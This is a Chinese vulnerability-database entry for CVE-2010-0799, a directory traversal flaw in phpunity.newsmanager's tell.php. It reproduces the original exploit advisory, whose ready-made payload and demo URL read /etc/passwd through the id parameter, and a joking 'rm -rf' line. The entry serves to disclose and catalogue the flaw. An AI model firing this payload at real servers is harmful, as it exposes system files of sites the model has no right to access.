Perlunity phpunity.newsmanager 'misc/tell_a_friend/tell.php' 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118961 漏洞类型 路径遍历
发布时间 2010-01-30 更新时间 2010-01-30
CVE编号 CVE-2010-0799 CNNVD-ID CNNVD-201003-018
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/11290
https://www.securityfocus.com/bid/39158
https://cxsecurity.com/issue/WLB-2010030157
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-018
|漏洞详情
phpunity.newsmanager中的脚本misc/tell_a_friend/tell.php存在目录遍历漏洞。远程攻击者可以借助id参数(在id参数中加入..目录遍历符),读取任意文件。
|漏洞EXP
#############################################################################################################
## phpunity.newsmanager - Local file inclusion 	(id)	                                                   ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : 28 januari, 2010 						                                   ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.perlunity.de/
[+] Download : http://www.perlunity.de/php/scripts/phpunity.newsmanager.shtml
[+] version : -
[+] Vulnerability : LFI
[+] Dork : syalalala
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://server/[kaMtiEz]/misc/tell_a_friend/tell.php?id=[INDONESIANCODER]

[ EXPLOIT ]

../../../../../../../etc/passwd

[ DEMO ]

http://server/phpunity.newsmanager/phpunity-newsmanager/misc/tell_a_friend/tell.php?id=../../../../../../../etc/passwd


[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ] 

[+] Babe enyak adek i love u pull dah .. 
[+] to someone i dont know who u are .. but u are so hot ! :P~~
[+] rm -rf 

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
|受影响的产品
phpunity phpunity.newsmanager 0
|参考资料

来源:MISC
链接:http://www.exploit-db.com/exploits/11290
来源:SECUNIA
名称:38409
链接:http://secunia.com/advisories/38409
来源:MISC
链接:http://packetstormsecurity.org/1001-exploits/phpunity-lfi.txt
来源:OSVDB
名称:62036
链接:http://osvdb.org/62036